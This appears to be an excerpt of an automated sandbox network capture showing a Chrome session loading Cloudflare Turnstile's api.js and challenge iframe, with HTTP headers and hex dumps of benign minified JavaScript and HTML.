                                                                                      2024-11-15 17:08:50 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                                      Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                                      2024-11-15 17:08:50 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                                      Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
                                                                                      2024-11-15 17:08:50 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                                      Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                                      2024-11-15 17:08:50 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                                      Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.1662575104.18.94.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:51 UTC383OUTGET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:51 UTC471INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:08:51 GMT
                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                      Content-Length: 47672
                                                                                      Connection: close
                                                                                      accept-ranges: bytes
                                                                                      last-modified: Mon, 28 Oct 2024 19:08:47 GMT
                                                                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                      access-control-allow-origin: *
                                                                                      cross-origin-resource-policy: cross-origin
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d87eb91b6c2b-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:08:51 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                      Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                      Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                      Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                      Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                      Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                                      Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                                      Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                                      Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                                      Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                                      Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.1662576104.18.95.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:51 UTC802OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Upgrade-Insecure-Requests: 1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: navigate
                                                                                      Sec-Fetch-Dest: iframe
                                                                                      Referer: https://gambol.smarthost.pl/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:51 UTC1362INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:08:51 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Length: 26468
                                                                                      Connection: close
                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                      content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                      cross-origin-embedder-policy: require-corp
                                                                                      cross-origin-opener-policy: same-origin
                                                                                      cross-origin-resource-policy: cross-origin
                                                                                      origin-agent-cluster: ?1
                                                                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                      critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                      referrer-policy: same-origin
                                                                                      document-policy: js-profiling
                                                                                      2024-11-15 17:08:51 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 33 30 64 38 37 65 63 38 61 31 36 63 33 66 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                      Data Ascii: Server: cloudflareCF-RAY: 8e30d87ec8a16c3f-DFWalt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:08:51 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                      Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
